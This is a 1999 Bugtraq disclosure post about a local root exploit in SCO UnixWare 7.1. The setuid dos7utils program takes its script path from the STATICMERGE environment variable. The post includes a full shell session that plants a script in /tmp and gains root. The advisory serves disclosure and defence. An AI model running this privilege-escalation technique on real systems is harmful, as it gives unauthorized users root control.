=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


 Date: Вт, 05 окт 1999  16:30:49

   От: Brock Tellier <btellier@USA.NET>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: SCO UnixWare 7.1 local root exploit

--------------------------------------------------------------------------------




Greetings,



A vulnerability exists in the /usr/lib/merge/dos7utils program (suid root by

default) which allows any user to execute any command as root.  The dos7utils

program gets its localeset.sh exec path from the environment variable

STATICMERGE.  By setting this to a directory writable by us and setting the -f

switch, we can have dos7utils run our program as follows:





bash-2.02$ uname -a; id; pwd

UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5

uid=101(xnec) gid=1(other)

/usr/lib/merge

bash-2.02$ export STATICMERGE=/tmp

bash-2.02$ cat > /tmp/localeset.sh

#!/bin/sh

id

bash-2.02$ chmod 700 /tmp/localeset.sh 

bash-2.02$ ./dos7utils -f bah

uid=0(root) gid=1(other)

groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),
10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)

bash-2.02$ 

----



Searching through the securityfocus vulnerability archives yields 0 matches

for search string "unixware", but several for "openserver".  I thought this

was rather strange, considering that SCO is discontinuing OpenServer after

5.0.5 in favor of the much more reliable (though not security-wise, evidently)

UnixWare 7.  And so begins my audit of the virgin Unixware 7 so soon after my

incomplete audit of SCO 5.0.5.



Brock Tellier

UNIX Systems Administrator



____________________________________________________________________

Get free email and a permanent address at http://www.netaddress.com/?N=1